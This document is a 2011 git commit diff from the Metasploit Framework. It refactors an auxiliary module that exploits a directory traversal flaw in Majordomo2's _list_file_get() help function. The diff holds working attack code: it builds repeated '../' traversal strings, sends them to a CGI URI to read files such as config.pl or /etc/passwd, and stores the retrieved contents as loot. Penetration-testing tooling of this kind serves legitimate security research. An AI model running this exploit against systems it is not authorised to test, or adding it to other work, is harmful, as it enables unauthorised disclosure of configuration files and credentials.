Correct formatting and API usage in the Majordomo2 module

git-svn-id: file:///home/svn/framework3/trunk@11941 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-12 16:38:17 +00:00 · 2011-03-12 16:38:17 +00:00 · 2578a0e16b
parent 1fc2f8defe
commit 2578a0e16b
1 changed files with 22 additions and 19 deletions
--- a/modules/auxiliary/gather/majordomo2_directory_traversal.rb
+++ b/modules/auxiliary/gather/majordomo2_directory_traversal.rb
@ -16,14 +16,13 @@ class Metasploit3 < Msf::Auxiliary
 	def initialize
 		super(
 			'Name'           => 'Majordomo2 _list_file_get() Directory Traversal',
-			'Version'        => '$Revision: 10821 $',
 			'Description'    => %q{
 					This module exploits a directory traversal vulnerability present in
 				the _list_file_get() function of Majordomo2 (help function). By default, this 
 				module will attempt to download the Majordomo config.pl file.
 			},
-			'Author'         =>
-				['Nikolas Sotiriu http://www.sotiriu.de'],
+			'Author'         =>	['Nikolas Sotiriu'],
+			'Version'        => '$Revision: 10821 $',			
 			'References'     =>
 				[
 					['OSVDB', '70762'],
@ -42,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
 				Opt::RPORT(80),
 				OptString.new('FILE', [ true,  "Define the remote file to view, ex:/etc/passwd", 'config.pl']),
 				OptString.new('URI', [true, 'Majordomo vulnerable URI path', '/cgi-bin/mj_wwwusr/domain=domain?user=&passw=&func=help&extra=']),
-				OptInt.new('DEEP', [true, 'Define the max deep of traversals', '8']),
+				OptInt.new('DEPTH', [true, 'Define the max traversal depth', 8]),
 			], self.class)
 	end

@ -51,20 +50,20 @@ class Metasploit3 < Msf::Auxiliary
 	end

 	def run_host(ip)
-		travString = [
+		trav_strings = [
 			'../',
 			'./.../'
 		]
-		uri = datastore['URI']
+		uri  = datastore['URI']
 		file = datastore['FILE']
-		deep = datastore['DEEP']
+		deep = datastore['DEPTH']
 		file = file.gsub(/^\//, "")

-		travString.each do |tStr|
-
-			i = 1
+		trav_strings.each do |trav|
+			str = ""
+			i   = 1
 			while (i <= deep)
-				str = "#{str}#{tStr}"
+				str = trav * i
 				payload = "#{str}#{file}"

 				res = send_request_raw(
@ -73,31 +72,35 @@ class Metasploit3 < Msf::Auxiliary
 						'uri'     => uri + payload,
 					}, 25)

-				print_status("Majordomo2 - Checking " + payload )
+				print_status("#{rhost}:#{rport} Trying URL " + payload )

 				if (res and res.code == 200 and res.body)
 					if res.body.match(/\<html\>(.*)\<\/html\>/im)
 						html = $1

 						if res.body =~ /unknowntopic/
-							print_error("Majordomo2 - Not found ...")
+							print_error("#{rhost}:#{rport} Could not retrieve the file")
 						else
 							file_data = html.gsub(%r{(.*)<pre>|<\/pre>(.*)}m, '')
-							print_good("Majordomo2 - Vulnerable")
-							print_good("Majordomo2 - File Output:\n" + file_data + "\n")
-							return :abort
+							print_good("#{rhost}:#{rport} Successfully retrieved #{file} and storing as loot...")
+							
+							# Transform HTML entities back to the original characters
+							file_data = file_data.gsub(/\&gt\;/i, '>').gsub(/\&lt\;/i, '<').gsub(/\&quot\;/i, '"')
+							
+							store_loot("majordomo2.traversal.file", "application/octet-stream", rhost, file_data, file)
+							return
 						end
 					else
-						print_error("Majordomo2 - No HTML was returned")
+						print_error("#{rhost}:#{rport} No HTML was returned")
 					end
 				else
-					print_error("Majordomo2 - Unrecognized #{res.code} response")
+					print_error("#{rhost}:#{rport} Unrecognized #{res.code} response")
 				end
 				i += 1;
 			end
 		end

-		print_error("Majordomo2 - Not vulnerable or you didn't look DEEP enough!")
+		print_error("#{rhost}:#{rport} Not vulnerable or the DEPTH setting was too low")
 	rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 	rescue ::Timeout::Error, ::Errno::EPIPE
 	end